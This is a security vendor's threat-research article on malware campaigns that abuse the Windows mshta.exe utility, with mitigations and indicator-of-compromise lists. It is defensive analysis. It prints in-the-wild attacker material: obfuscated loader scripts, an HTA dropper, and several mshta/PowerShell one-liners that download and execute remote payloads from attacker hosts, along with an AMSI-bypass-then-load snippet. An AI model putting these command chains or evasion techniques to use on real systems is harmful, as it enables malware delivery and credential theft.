Bitdefender security researchers have discovered that attackers continue to exploit Microsoft HTML Application Host (MSHTA), a legacy utility available by default on Windows systems that can execute VBScript and JavaScript from local or remote files.

Cybercriminals abuse legitimate, albeit legacy, tools to push a host of malware, ranging from run-of-the-mill password stealers to advanced threats. Bitdefender’s previous investigations already revealed how attackers used LOTL tactics in a Windows and macOS malware campaign that leveraged fake “Claude Code” Google ads.

“ClickFix” attacks were also used with a new LummaStealer and CastleLoader campaign, not to mention the malware used to infect the devices of people who downloaded pirated versions of Leonardo DiCaprio’s new film, One Battle After Another.

Key findings

• MSHTA remains a widely abused Living-off-the-Land binary (LOLBIN) despite being a legacy utility.
• Attackers use it across multiple malware categories, from commodity stealers to advanced threats.
• Campaigns frequently rely on multi-stage, fileless execution chains involving PowerShell and HTA scripts.
• Social engineering plays a critical role, including fake software downloads and ClickFix-style lures.
• Effective defense requires both user awareness and layered technical controls.

Microsoft announced the deprecation of VBScript in the second half of 2024, making it available as a Feature On Demand, enabled by default. In 2027, this feature will be disabled by default, and Microsoft plans to remove it entirely from Windows.

We analyzed how attackers continue to abuse MSHTA, another legacy utility that remains available by default on Windows systems and can execute VBScript and JavaScript from local or remote files.

In recent months, we noticed an increase in detections of mshta.exe in the execution chain, indicating that it remains a relevant Living-off-the-Land binary even after standalone Internet Explorer was retired.

The activity we analyzed spans multiple malware categories.

At the lower end, MSHTA is heavily used in delivery chains for commodity stealers such as LummaStealer and Amatera, as well as loaders such as CountLoader and Emmenhtal Loader.

At the same time, it also shows up in more advanced and persistent malware campaigns, including ClipBanker and PurpleFox. This range of abuse highlights why MSHTA continues to matter to defenders: it’s not a single malware family or intrusion model. It remains useful across the spectrum from opportunistic malware delivery to long-lived compromise.

During this investigation, we also identified recently introduced domain patterns for an HTA-based loader called CountLoader that delivers commodity malware.

Introduction

Although Internet Explorer reached end of support on June 15, 2022, Microsoft Edge still includes an IE mode to ensure backward compatibility, with support promised at least until 2029 [2].

This reveals a broader security problem: even after companies retire legacy products, parts of their ecosystem can persist in Windows for years, supporting older workflows and enterprise compatibility requirements.

 Threat actors frequently abuse trusted, preinstalled Windows binaries to execute malicious content while relying on software already present on the system.

These binaries, commonly referred to as Living-off-the-Land binaries (LOLBINs), are valuable because they help attackers reduce the need to drop custom tools, blend into legitimate system activity, and make malicious chains harder to distinguish from benign administrative activity.

Mshta.exe is just one of these utilities, originally associated with Internet Explorer and capable of running HTML Applications (HTA) using the Internet Explorer rendering engine.

HTA files can embed JavaScript and VBScript code, allowing script execution in the context of a trusted, signed process. Legacy components that many users consider obsolete can still serve as a convenient execution path for modern malware.

There is currently no public indication that this utility will also be removed from future versions of Windows. As long as it remains available by default, MSHTA remains relevant both as a residual administrative tool and as part of the exposed attack surface.

Legitimate use

Although MSHTA is a legacy utility with more modern alternatives that offer similar capabilities, some system administrators and software developers still use it to alert users to updates or to display simple web applications without opening a browser.

Around 10% of our MSHTA telemetry still consists of simple one-liner scripts that notify users about administrative tasks via javascript:alert() or vbscript:msgbox().

Another small portion of our MSHTA insights comes from seemingly legitimate login scripts executed through MSHTA one-liners that create a WScript.Shell object and run a local file in its context.

This remaining legitimate usage is important because it shows that MSHTA has not disappeared completely from real-world environments.

At the same time, these use cases are steadily becoming less common, and there are far more modern and legitimate ways to automate system administration tasks.

To accelerate this reduction in MSHTA use, we generally recommend moving away from MSHTA in administrative workflows wherever possible.

MSHTA as a Lolbin

LOLBINs (Living-off-the-Land binaries) are attractive to attackers because they are signed, familiar, and often implicitly trusted within enterprise environments. When abused, they can help adversaries execute code, retrieve remote payloads, and progress an intrusion without immediately relying on obviously malicious binaries.

MSHTA still fits this model well [10]. It is present by default on Windows systems, can execute script content in-memory, and can retrieve content from remote locations. These properties make it useful for stagers and loaders, allowing attackers to minimize on-disk artifacts and take advantage of a legitimate Microsoft-signed process during execution.

Since the start of the year, we have observed an increase in MSHTA-related activity. Given that legitimate use of this utility is gradually fading, this trend likely reflects a rise in malicious activity rather than renewed administrative adoption.

In the following sections, we’ll reveal the most prominent campaigns from our insights and show how threat actors continue to adapt MSHTA-based attacks to deliver commodity malware at scale.

Campaigns employing MSHTA

The MSHTA activity we analyzed spans multiple types of malware, including commodity information stealers such as LummaStealer and Amatera, multi-stage loaders such as CountLoader and Emmenhtal Loader, banking malware such as ClipBanker, and more persistent threats such as PurpleFox.

Across these campaigns, MSHTA serves a similar purpose: it provides attackers with a built-in, Microsoft-signed utility that can retrieve and execute remote script content during the initial or intermediate stages of an infection chain.

This makes MSHTA especially useful for malware delivery. In some cases, it is used to launch HTA-based loaders directly from attacker-controlled infrastructure. In others, it is embedded into broader chains involving phishing, fake software installers, ClickFix-style lures or scripted downloaders.

Our insights show that MSHTA most commonly appeared in campaigns that delivered stealers and loaders. This is significant because these malware families are often used to gain an initial foothold, steal credentials and browser-stored data, hijack sessions, and deliver additional payloads that can deepen the compromise.

This means that what may begin as the execution of a seemingly innocuous legacy Windows utility can quickly lead to account theft, financial fraud, data loss, or broader infection of the affected system.

This pattern is consistent with MSHTA’s role as a lightweight execution and staging mechanism. It is well-suited for retrieving obfuscated HTA content, launching in-memory scripts, and handing off execution to PowerShell, WScript, msiexec, or a final malware payload.

LummaStealer and Amatera via CountLoader

One of the most prominent MSHTA-related clusters in our telemetry involved CountLoader, an HTA-based loader used to deliver commodity malware, most notably the information stealers LummaStealer and Amatera.

These threats are relevant to users because their primary goal is to steal sensitive data, including credentials, browser-stored information, session tokens, and cryptocurrency-related data. In this delivery chain, MSHTA plays an important role as a lightweight execution mechanism that retrieves and launches the next-stage HTA payload from remote infrastructure.

The vast majority of detections for mshta.exe come from instances where the command line contains domains that appear to be legitimate services but are hosted on the .cc TLD (e.g., google-services[.]cc, memory-scanner[.]cc).

This campaign began to gain traction toward the end of 2025, peaked at the end of January 2026, and has since declined gradually as attackers shifted to other platforms to host the payloads.

These domains are often labeled as LummaStealer infrastructure on VirusTotal because Lumma is often the final payload delivered through this chain, and the same domains often appear in Lumma-related configurations.

However, the loader appears to be distinct and can be correlated with existing reports of CountLoader [5], [6]. We also observed the same loader chain delivering Amatera, another commodity information stealer.

The lures used in this campaign are similar to those employed by CastleLoader [7].

Victims are enticed through messages, social media posts, or SEO-poisoned websites that promise free or cracked software. The downloaded archive may include the password directly in its filename or contain a document indicating the password to use.

The victim executes a Setup.exe file, which is in fact a legitimate Python interpreter. Alongside Setup.exe, the archive contains one or more python3<X>.dll files that the interpreter automatically loads.

These are legitimate Python core DLLs, but during Python runtime initialization, they cause the local Lib directory to be used for dependency resolution and basic module loading. In the analyzed sample, the malicious Python script resided in .\Lib\encodings\aliases.py and was launched through the corresponding __init__.py file.

The same directory also contains a renamed MSHTA executable, iso2022.exe. The malicious aliases.py script launches this binary to contact the C2 infrastructure and retrieve the HTA loader.

To construct the malicious URLs, the Python code defines individual characters as global variables and combines them through formatted strings before finally invoking os.system(cmd) to execute the resulting command line.

### Regions

global_region = f'{ctype}d Lib{typeB}encodings'
local_format = f'{ptype}{typeE}org{typeA}wp{typeD}{atype}{typeA}{gtype}{typeA}stats{typeE}{ltype}'
en_UK = f'{htype}{ttype}{ttype}p{stype}{typeC}{typeB}{typeB}'
en_US = f'{typeE}{ctype}{ctype}'
en_ES = f'iso2022{typeE}e{xtype}e'

### Protection
mem_protect = f'{global_region} {typeH}{typeH} {en_ES} {en_UK}{local_format}'
ram_protect = f'alpha{typeD}centavr{typeE}{ctype}{ctype}'
rem_protect = f'{ctype}{mtype}d {typeA}{ctype} {stype}{ttype}ar{ttype} {typeA}b \"\" {ctype}{mtype}d {typeA}{ctype} '

### Probes
positive_probe = f'{mem_protect} {typeH} {en_ES} {en_UK}{ram_protect}'
negative_probe = f'{rem_protect}'

cmd = f'{positive_probe}'
os.system(cmd)

The resulting command line is:

cd Lib\encodings && iso2022.exe https:\\planetitude[.]org/wp-admin/chellenge/stats.location & iso2022[.]exe https:\\alpha-centavr[.]cc

The HTA decodes the next payload from an array of character codes and launches it. The variable names seem to be generated from a dictionary of technical terms, and they vary from file to file.

Starting in late February 2026, we observed a new CountLoader domain-hosting pattern. The naming convention remained similar, using domains that imitate legitimate service names, but the infrastructure shifted to .vg and .gl TLDs.

Examples include explorer[.]vg, ccleaner[.]gl, and microservice[.]gl. The HTA scripts embedded at these locations follow the same obfuscation pattern observed in the earlier .cc-based infrastructure.

Emmenhtal Loader

Another prominent MSHTA-based infection chain we observed involved Emmenhtal Loader [3], a multi-stage loader used to deliver commodity malware, including information stealers such as LummaStealer. In this campaign, MSHTA serves as an early-stage execution mechanism that retrieves and launches a remote HTA payload, which then unfolds through multiple script-based stages.

The infection chain begins with phishing messages on Discord that contain links to pages designed to hijack the clipboard and trick the user into executing a malicious command line as part of a fake human-verification process.

These pages resemble legitimate reCAPTCHA systems, but are hosted on suspicious websites (e.g. humancheck[.]shop/pass-this-step-to-continue[.]html) and include JavaScript code that copies a malicious command line to the clipboard when the user accesses the page.

The user is then lured into pressing Win + R to open the Run dialog, followed by Ctrl + V and Enter to paste and execute the command. As a result, explorer.exe appears to legitimately launch mshta.exe with a command line such as:

mshta[.]exe hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4 #  ✅ ''I am not a robot - reCAPTCHA Verification ID: 2165

Although these websites are often taken down quickly by their hosting providers, some server responses remain available on VirusTotal and can still be analyzed.

The file hosted on the server is a valid HTA, but it is intentionally bloated with large amounts of garbage data that are ignored during execution. Embedded within this content are a few valid HTML blocks that contain the malicious script. The file is never written to disk; instead, it is executed directly in memory by mshta.exe.

The HTML structure is spread across the file, inserted between unusable data that is ignored. First, it sets the MSHTA window to 1x1 pixels, starts it minimized, and hides it from the taskbar to evade detection.

Next, the HTML body invokes the script entry point:

The script block contains a minimal JavaScript loader that implements a Base64 decoding function and includes a large Base64-encoded string as a variable. The main function decodes and executes the embedded script.

<script>
function HbQIdLwSSIRvbVXZWLOwjRQqttuGTqKP(b64) {
    var VonICsfLpEqDZndPtRRVmRdurFjpCMUv="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    var pad=0;
    if(b64.length>=2 && b64.substr(b64.length-2)==="=="){pad=2;b64=b64.substr(0,b64.length-2);}
    else if(b64.length>=1 && b64.substr(b64.length-1)==="="){pad=1;b64=b64.substr(0,b64.length-1);}
    var out=[];
    var i=0;
    while(i<b64.length){
        var e1=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));
        var e2=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));
        var e3=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));
        var e4=VonICsfLpEqDZndPtRRVmRdurFjpCMUv.indexOf(b64.charAt(i++));

        var c1=(e1<<2)|(e2>>4);
        var c2=((e2&15)<<4)|(e3>>2);
        var c3=((e3&3)<<6)|e4;
        out.push(c1&0xFF);
        if(e3!==64&&e3!==-1) out.push(c2&0xFF);
        if(e4!==64&&e4!==-1) out.push(c3&0xFF);
    }
    if(pad>0) out.splice(out.length-pad,pad);

    var rECeQYjgakLNnbZcTJmkoefcDPJScPAz="";
    for(var x=0;x<out.length;x++){
        rECeQYjgakLNnbZcTJmkoefcDPJScPAz+=String.fromCharCode(out[x]);
    }
    return rECeQYjgakLNnbZcTJmkoefcDPJScPAz;
}

var rDiPjSLADFoHqVucyLWWZenMlZdunYAi = <B64_script_redacted_for_size>;

function ZGnRfrBcHrSGXLgAhCCMsyQTuwRQHDQT() {
    var cxabulitGWnsgaALcqJZHzjkKyjdyyyo = HbQIdLwSSIRvbVXZWLOwjRQqttuGTqKP(rDiPjSLADFoHqVucyLWWZenMlZdunYAi);
    eval(cxabulitGWnsgaALcqJZHzjkKyjdyyyo);
}
</script>

The decoded result is a second-stage loader that includes the same Base64 routine and two decryption functions. The apparent size of this script is misleading, as it includes hundreds of lines of small helper functions that are never actually called.

Its purpose is to decrypt a string stored in a global variable and create a WScript.Shell object, and launch the decoded script in that new WScript environment, still under the execution chain initiated by mshta.exe.

var cDhmBQsxdNEUHhzpdeyyybZMzVNANXtp = <redacted_encrypted_payload>
var LevylKBNaEDCESWQQeQznakYNfOEICxk = <redacted_decryption_key>
var VFjTZSncvgnebyEyMwfLTieiopsaYfQZ = <redacted_b64_string>

function initMain() {
    var stg1 = from_base64(VFjTZSncvgnebyEyMwfLTieiopsaYfQZ);
    var stg2 = VQGTmVqlpKoSesHrvqRZECwHNdrdrDRX(stg1, LevylKBNaEDCESWQQeQznakYNfOEICxk);
    var EYgUwBZqUyrgJIRdiVDwqyUHlgusmKOr = xor_decrypt(stg2, cDhmBQsxdNEUHhzpdeyyybZMzVNANXtp);
    var decoded_payload_script = "";
    for(var i=0; i<EYgUwBZqUyrgJIRdiVDwqyUHlgusmKOr.length; i++) {
        decoded_payload_script += String.fromCharCode(EYgUwBZqUyrgJIRdiVDwqyUHlgusmKOr[i]);
    }

    try {
        var sh = spawn_wscript_shell();
        sh.Run(decoded_payload_script, 0, false);
    } catch(e) {}

    window.close();
}

initMain();

The result command line is a one-liner that downloads a PowerShell script from a remote location and executes it in memory without saving it to disk.

Start-Process "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell[.]exe" -ArgumentList "-w hidden -ep bypass -nop -Command `"iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]klipdiheqoe[.]shop/ruwkl[.]png'))`"" -WindowStyle Hidden

The downloaded PowerShell script is heavily obfuscated; manually reversing it is almost impossible. However, with script block logging and some tooling, we can reconstruct the final layer of script that was executed.

The final, deobfuscated version of the PowerShell script consists of two parts. The first one is an AMSI bypass by patching clr.dll, possibly taken from a publicly available GitHub repository [4]. After the AMSI bypass, there is a big Base64-encoded string, followed by three lines of code that decode the Base64 and load the resulting byte array as an assembly.

$bytes = [System.Convert]::FromBase64String($a);
[Reflection.Assembly]$assembly = [System.AppDomain]::CurrentDomain.Load($bytes) # Load Assembly
$assembly.EntryPoint.Invoke($null, @())

This loader is most often used to execute commodity malware on the infected system. In the case we analyzed, the assembly that was executed is a well-known LummaStealer assembly (1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84) that contains C2 domains associated with the Lumma infrastructure.

ClipBanker

Another MSHTA-driven cluster in our telemetry involved ClipBanker [8], a malware family primarily designed to steal cryptocurrency by replacing wallet addresses in the victim’s clipboard. In this infection chain, MSHTA serves as an early-stage execution mechanism that launches a remote HTA and then quickly transitions to PowerShell-based persistence and payload delivery.

The HTA executed from the remote location hxxps[://]asd[.]s7610rir[.]pw/win/checking[.]hta is a simple script that hides the MSHTA window by moving it to negative coordinates, creates a Wscript Shell object and runs a Base64-encoded PowerShell command.

<HTML>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD>
<script language="VBScript">
        Window.ReSizeTo 0, 0
        Window.moveTo -2000,-2000
        Function var_func()
                Dim var_shell
                Set var_shell = CreateObject("Wscript.Shell")
                var_shell.run "cmd /c powershell.exe -w 1 -NoProfile -InputFormat None -ExecutionPolicy Bypass -e <redacted_b64_command>, 0, true
        End Function

        var_func
</script>
<body>
</body>
</HEAD>
</HTML>

The command downloads the second stage from hxxp[://]185[.]208[.]159[.]199, which is a Powershell file called checking.ps1 (333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2).

The role of this script is to ensure Windows Defender exclusions and persistence, which executes the ClipBanker downloader obtained from: hxxp[://]87[.]96[.]21[.]84/ichigo-lite[.]ps1 (38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D).

The scheduled task names masquerade as services that sound legitimate (e.g., Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1237).

Finally, a cleanup script gets executed, downloaded from hxxp[://]87[.]96[.]21[.]84/del[.]ps1 (7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA).

This script cleans up the files used during the attack and terminates processes that might have been involved in dynamic analysis in a sandbox (e.g., Procmon, Autoruns).

PurpleFox - even sophisticated threats use MSHTA

MSHTA is not only used in commodity-stealing and loader campaigns. It also appears in delivery chains associated with PurpleFox [9], a more advanced and persistent malware family that has remained active for years.

This is important because it shows that MSHTA is useful not only for lightweight initial infection stages, but also for malware operations focused on stealth, persistence, and long-term control of the compromised system.

Since emerging in 2018, PurpleFox has continued to expand its arsenal and remains active in 2026. One of its long-standing delivery methods, however, has remained consistent: launching msiexec from an MSHTA command line in order to download and execute an MSI package disguised as a .png file.

The command lines are recognizable by the list of IP addresses they attempt to contact and by the .png file that is ultimately executed through msiexec:

mshta.exe vbscript:createobject("wscript.shell").run("Cmd /c for /d %i in (195[.]189[.]28[.]244:17807 103[.]124[.]106[.]194:18413 58[.]221[.]59[.]20:17256 ) do Msiexec /i http://%i/3EBCE3A4.Png /Q",0)(window.close)

Once installed, PurpleFox functions as a rootkit-enabled backdoor whose primary objectives are to remain hidden, establish persistence, and execute on-demand commands from its C2 infrastructure.

These capabilities can support a wide range of malicious activity, including information theft, surveillance, and disruptive actions such as DDoS attacks.

MSHTA and PowerShell - an intermediary step in multi-stage attacks

Our telemetry shows multiple smaller clusters of PowerShell executions via MSHTA, where MSHTA creates a wscript shell that runs the PowerShell process to execute the loader responsible for downloading the next stage.

We observed obfuscation techniques unique to each campaign, aiming to mask keywords that trigger alerts in EDRs and SIEMs.

The first category features URLs that appear to link to image files but actually contain a PowerShell script downloaded and executed in memory. These IPs are typically used by XWorm/Danabot. PowerShell keywords are split into multiple tokens to bypass detection.

mshta.exe" vbscript:close(CreateObject("WScript.Shell").Run("powershell $L='(New-Object Net.We';$Y='bClient).Downlo';$V='adString(''http://92[.]255[.]57[.]155/b.jpg'')';$F=I`E`X ($L,$Y,$V -Join '')|I`E`X",0))

A variation of the XWorm command line adds junk characters, which are removed by the String.Replace method.

mshta.exe" vbscript:close(CreateObject("WScript.Shell").Run("powershell IEX(('#!!i!Qw#Q!r #8###5#.!!!2###0!!8#.8###4!!.2!!!0###8!/#x!!!.j###pg# |#i!!e!!!!x#').RePlACE('Q','').REplAcE('!','').rEpLAce('#',''))",0))

The next category involves the Lalala information stealer, where the script is delivered only if the POST request to the PHP script includes a predefined password. Other PowerShell keywords remain unobfuscated.

mshta.EXE" vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell Invoke-Expression -Command:(iwr -uri 185[.]156[.]172[.]22/gate990.php -method post -body gieM3iR5).content"", 0 : window.close")

Another cluster of PowerShell commands executes scripts previously downloaded in the chain. This delivery method is noisier because it allows scanning the script file for malware.

mshta.EXE" vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\U_f8d33485bec26b2b1969f910c131f027\AppData\Roaming\Adobe\peyneKzk2.ps1 """""" ,0:close")

The final major category involves command lines where the URL is encoded and stored in local variables. The one-liner decodes the URL and executes the downloaded payload in memory.

mshta.exe" vbscript:close(CreateObject("WScript.Shell").Run("powershell $Z='aXdyIGh0dHBzOi8vMHg0NC5pbmZvL2F8aWV4';$B=[System.Convert]::FromBase64String($Z);$D=[System.Text.Encoding]::UTF8.GetString($B);iex $D",0))

DriverPack - an example of legitimate usage

Not every MSHTA execution we observed was clearly malicious. A significant portion of detections came from DriverPack's update mechanism, an older software package that downloads driver files from third-party sources rather than through official Microsoft update channels.

Although DriverPack is not inherently malicious, many security vendors classify some of its components as potentially unwanted applications (PUA).

In the cases we analyzed, DriverPack used a scheduled task to launch mshta.exe, which then executed an HTA in memory to check for updates or ensure that the latest version of the software was installed.

While this appears to serve a legitimate software-maintenance purpose, the method is unorthodox and overlaps with techniques commonly used in malicious delivery chains.

This is an important reminder that MSHTA usage is not automatically malicious. At the same time, using MSHTA to retrieve and execute remote content as part of an update workflow is not a recommended design choice, especially when more modern and transparent alternatives are available.

Recommended user and organizational mitigations

Defense against MSHTA-related attacks generally falls into two broad categories: user awareness and behavior, and the implementation of technical security controls.

Many of the attack chains presented in this article rely on user interaction. In some cases, users are persuaded to download software or media from untrusted websites that promise free or cracked content. In others, they are manipulated through social engineering into willingly executing malicious commands copied to the clipboard. For this reason, user education remains an important line of defense.

Users should be informed about these tactics and regularly reminded of the risks associated with downloading untrusted files, following suspicious instructions, or executing commands they do not fully understand.

Technical mitigations are equally important. MSHTA-based attacks usually do not rely on a single malicious file, but on a chain of script execution, command-line abuse, in-memory stages, and follow-on payload delivery. That is why protection needs to cover multiple points in the attack chain, from attack surface reduction to pre-execution detection and runtime behavioral blocking.

Bitdefender employs various technologies to detect these attacks as part of its layered defense strategy, all of which are integrated into Bitdefender’s security solutions.

Until Microsoft removes legacy scripting utilities that are still present by default in Windows, users can reduce exposure by ensuring that they run a comprehensive security solution, such as Bitdefender Ultimate Security.

Additionally, Bitdefender Threat Intelligence Solutions help organizations detect, investigate, and respond to cyber threats faster by providing real-time intelligence on malicious files, URLs, domains, and IPs. Delivered through feeds, APIs, and the IntelliZone portal, the solutions support both security teams and security vendors with actionable threat data, contextual insights, and automated integrations for stronger cybersecurity operations.

In environments where they are no longer required for legitimate workflows, binaries such as wscript.exe and mshta.exe should be restricted or blocked, and older scripts should be migrated to more modern and maintainable alternatives wherever possible.

IoCs

Emmenhtal Loader

Indicator	Type	Description
AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9	SHA256	Initial HTA launched after ClickFix
02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE	SHA256	Obfuscated PowerShell
1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84	SHA256	LummaStealer payload
hxxp[://]185[.]147[.]124[.]40/Capcha[.]html	URL	Emmenhtal URL
hxxp[://]92[.]255[.]57[.]155/Capcha[.]html	URL	Emmenhtal URL
hxxps[://]denek[.]local-wanderer[.]shop/RIWZ[.]mp4	URL	Emmenhtal URL
hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4	URL	Emmenhtal URL
hxxps[://]macphotoeditor[.]shop/singl5[.]mp4	URL	Emmenhtal URL
hxxps[://]topofsuper[.]shop/re5[.]mp4	URL	Emmenhtal URL
hxxps[://]antibot-check[.]icu/Capcha[.]html	URL	Emmenhtal URL
hxxps[://]checkpageonce[.]com/singl6[.]mp4	URL	Emmenhtal URL
hxxps[://]echoicedeals[.]shop/s6[.]mp3	URL	Emmenhtal URL
hxxps[://]kizmond[.]shop/riiw1[.]mp4	URL	Emmenhtal URL
hxxps[://]klipjaqemiu[.]shop/web44[.]mp4	URL	Emmenhtal URL
hxxps[://]macphotoeditor[.]shop/singl6[.]mp4	URL	Emmenhtal URL
hxxps[://]onceletthemcheck[.]com/singl5[.]mp4	URL	Emmenhtal URL
hxxps[://]pawpaws[.]readit-carfanatics[.]com/madonna[.]mp4	URL	Emmenhtal URL
hxxps[://]propofgustestyle[.]info/recaptcha-verify[.]html	URL	Emmenhtal URL
hxxps[://]recaptcha-process[.]com/recaptcha-verify[.]html	URL	Emmenhtal URL
hxxps[://]retrosome[.]shop/ru2-2[.]eml	URL	Emmenhtal URL
hxxps[://]savecoupons[.]store/s7[.]mp4	URL	Emmenhtal URL
hxxps[://]solve[.]gevaq[.]com/awjxs[.]captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae	URL	Emmenhtal URL
hxxps[://]solve[.]jenj[.]org/awjxs[.]captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8	URL	Emmenhtal URL
hxxps[://]thepremiumstuffs[.]shop/s5[.]mp4	URL	Emmenhtal URL
hxxps[://]triptrip[.]melody-wave[.]shop/re2[.]mp4	URL	Emmenhtal URL
hxxps[://]check[.]qlkwr[.]com/awjsx[.]captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0	URL	Emmenhtal URL
hxxps[://]driftcharm[.]shop/S6[.]mp4	URL	Emmenhtal URL
hxxps[://]etrademart[.]shop/s6[.]mp3	URL	Emmenhtal URL
hxxps[://]scrutinycheck[.]cash/singl5[.]mp4	URL	Emmenhtal URL
hxxps[://]simplerwebs[.]space/anrek[.]mp4	URL	Emmenhtal URL
hxxps[://]simplerwebs[.]world/mine[.]json	URL	Emmenhtal URL

CountLoader / LummaStealer domains

Indicator	Type	Description
memory-scanner[.]cc	Domain	CountLoader / LummaStealer infrastructure
fileless-market[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell1-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
holiday-forever[.]cc	Domain	CountLoader / LummaStealer infrastructure
system-monitor[.]cc	Domain	CountLoader / LummaStealer infrastructure
forest-entity[.]cc	Domain	CountLoader / LummaStealer infrastructure
indeanapolice[.]cc	Domain	CountLoader / LummaStealer infrastructure
files-storage[.]cc	Domain	CountLoader / LummaStealer infrastructure
some-othertag[.]cc	Domain	CountLoader / LummaStealer infrastructure
s3-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s3-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
microservice-update-s2-bucket[.]cc	Domain	CountLoader / LummaStealer infrastructure
parent-control[.]cc	Domain	CountLoader / LummaStealer infrastructure
alphazero1-endscape[.]cc	Domain	CountLoader / LummaStealer infrastructure
microservice-update-s1-bucket[.]cc	Domain	CountLoader / LummaStealer infrastructure
globalsnn2-new[.]cc	Domain	CountLoader / LummaStealer infrastructure
polystore9-servicebucket[.]cc	Domain	CountLoader / LummaStealer infrastructure
hardware-office[.]cc	Domain	CountLoader / LummaStealer infrastructure
immortal-service[.]cc	Domain	CountLoader / LummaStealer infrastructure
globalsnn1-new[.]cc	Domain	CountLoader / LummaStealer infrastructure
acio-patron[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell10-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
globalsnn3-new[.]cc	Domain	CountLoader / LummaStealer infrastructure
alpha-centavr[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell3-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell4-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell5-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell6-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell7-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell8-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell9-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
azure-s3-bucket[.]cc	Domain	CountLoader / LummaStealer infrastructure
hosting-control[.]cc	Domain	CountLoader / LummaStealer infrastructure
communicationfirewall-security[.]cc	Domain	CountLoader / LummaStealer infrastructure
hell2-kitty[.]cc	Domain	CountLoader / LummaStealer infrastructure
domain-monitoring[.]cc	Domain	CountLoader / LummaStealer infrastructure
network-defender[.]cc	Domain	CountLoader / LummaStealer infrastructure
critical-service[.]cc	Domain	CountLoader / LummaStealer infrastructure
google-services[.]cc	Domain	CountLoader / LummaStealer infrastructure
offshore-storage[.]cc	Domain	CountLoader / LummaStealer infrastructure
urugvai[.]cc	Domain	CountLoader / LummaStealer infrastructure
web3-walletnotify[.]cc	Domain	CountLoader / LummaStealer infrastructure
debank-api[.]cc	Domain	CountLoader / LummaStealer infrastructure
py-installer[.]cc	Domain	CountLoader / LummaStealer infrastructure
memory-protection-layer1[.]cc	Domain	CountLoader / LummaStealer infrastructure
s10-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
sentinel1-endpoint-security[.]cc	Domain	CountLoader / LummaStealer infrastructure
s4-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s5-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s6-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s7-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s8-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s9-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s1-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
s2-microservice-updatehub[.]cc	Domain	CountLoader / LummaStealer infrastructure
ms-team-ping6[.]com	Domain	CountLoader / LummaStealer infrastructure
holiday-updateservice[.]com	Domain	CountLoader / LummaStealer infrastructure
health-smooth-eu3[.]com	Domain	CountLoader / LummaStealer infrastructure
health-smooth-eu2[.]com	Domain	CountLoader / LummaStealer infrastructure
fileless-storage-s3[.]cc	Domain	CountLoader / LummaStealer infrastructure
bigbrainsholdings[.]com	Domain	CountLoader / LummaStealer infrastructure
my-smart-house1[.]com	Domain	CountLoader / LummaStealer infrastructure
explorer[.]vg	Domain	New CountLoader infrastructure
ccleaner[.]gl	Domain	New CountLoader infrastructure
microservice[.]gl	Domain	New CountLoader infrastructure
geo-foundation[.]vg	Domain	New CountLoader infrastructure
deluxe[.]gl	Domain	New CountLoader infrastructure
silverhost[.]vg	Domain	New CountLoader infrastructure
msgrouppolicy[.]vg	Domain	New CountLoader infrastructure
holypriest[.]gl	Domain	New CountLoader infrastructure
msedge[.]vg	Domain	New CountLoader infrastructure

ClipBanker

Indicator	Type	Description
333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2	SHA256	checking.ps1
38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D	SHA256	ichigo-lite.ps1
7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA	SHA256	del.ps1
185[.]208[.]159[.]199	IP	IP hosting checking.ps1
87[.]96[.]21[.]84	IP	IP hosting further payloads
